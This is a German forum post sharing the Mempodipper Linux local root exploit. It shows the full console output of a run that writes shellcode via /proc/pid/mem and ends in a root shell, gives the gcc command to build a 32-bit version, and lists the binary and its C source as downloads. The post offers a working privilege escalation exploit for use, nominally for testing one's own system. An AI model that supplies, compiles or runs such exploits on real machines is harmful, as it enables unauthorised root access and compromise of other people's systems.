Root-Rechte-durch-Speicherzugriff

    • Root-Rechte-durch-Speicherzugriff

      für alle die Ihr 64bit Linuxsytem mal testen wollen Root-Rechte durch Speicherzugriff


      Quellcode

      1. ./mempodipper_static
      2. ===============================
      3. = Mempodipper =
      4. = by zx2c4 =
      5. = Jan 21, 2012 =
      6. ===============================
      7. [+] Opening socketpair.
      8. [+] Waiting for transferred fd in parent.
      9. [+] Executing child from child fork.
      10. [+] Opening parent mem /proc/12439/mem in child.
      11. [+] Sending fd 5 to parent.
      12. [+] Received fd at 5.
      13. [+] Assigning fd 5 to stderr.
      14. [+] Ptracing su to find next instruction without reading binary.
      15. [+] Resolved exit@plt to 0x401ce8.
      16. [+] Calculating su padding.
      17. [+] Seeking to offset 0x401cdc.
      18. [+] Executing su with shellcode.
      19. sh-4.2# id
      20. uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),115(lpadmin),117(admin),122(sambashare)
      21. sh-4.2#
      Alles anzeigen



      das binary ist für 64bit für 32bit das c-file wie folgt übersetzen:

      Quellcode

      1. gcc -Wall -g -static mempodipper.c -o mempodipper_static
      Dateien
      • mempodipper_stati.

        (838,42 kB, 324 mal heruntergeladen, zuletzt: )
      • mempodipper.c

        (6,63 kB, 301 mal heruntergeladen, zuletzt: )
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.